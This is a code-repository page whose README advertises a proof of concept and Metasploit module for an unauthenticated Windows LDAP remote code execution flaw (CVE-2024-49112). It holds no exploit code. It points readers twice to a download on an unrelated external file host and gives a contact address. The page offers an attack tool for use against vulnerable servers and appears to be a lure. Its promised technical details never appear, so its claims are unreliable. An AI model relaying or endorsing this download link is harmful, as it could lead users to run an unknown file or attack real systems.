# CVE-2024-49112-RCE-PoC **Repository Path**: AJay13/CVE-2024-49112-RCE-PoC ## Basic Information - **Project Name**: CVE-2024-49112-RCE-PoC - **Description**: No description available - **Primary Language**: Unknown - **License**: Not specified - **Default Branch**: main - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 0 - **Created**: 2025-01-05 - **Last Updated**: 2025-01-05 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README # CVE-2024-49112-RCE-PoC CVE-2024-49112 Windows LDAP RCE PoC and Metasploit Module
[Link to Download: ](https://etxarny.com/f/072b4a1d-5dc3-4a69-be74-184f7c8fcc9b) ## Contact Information You can reach me at: [bollo.b0@proton.me](mailto:bollo.b0@proton.me) # CVE-2024-49112: Integer Overflow Vulnerability in Windows LDAP Service Leading to Unauthenticated RCE The **Windows Lightweight Directory Access Protocol (LDAP)** service is vulnerable to an **integer overflow**, which can lead to **unauthenticated remote code execution (RCE)**. This vulnerability allows attackers to execute arbitrary code on a vulnerable system. here, we focus on exploiting the LDAP **server-side** vulnerability (unauthenticate and no user interaction). ## Vulnerability Overview - **CVE Identifier**: **CVE-2024-49112** - **Vulnerability Type**: **Integer Overflow** - **Impact**: **Unauthenticated Remote Code Execution** - **User Interaction**: **None required** This vulnerability exists in both the **LDAP server** and the **LDAP client**. However, exploiting these components requires different approaches. here, we will focus on exploitation of the **LDAP server**, which can be targeted directly to achieve RCE without any user interaction. ## Exploit I will include all my findings and technical details regarding the above mentioned component
with the python script showed below in the video PoC and the custom metasploit module which
I wrote for this to make it easier for post exploitations.
# [Link to Download: ](https://etxarny.com/f/072b4a1d-5dc3-4a69-be74-184f7c8fcc9b) ## PoC Video You can view PoC video here: ![Watch the PoC](ldap.gif).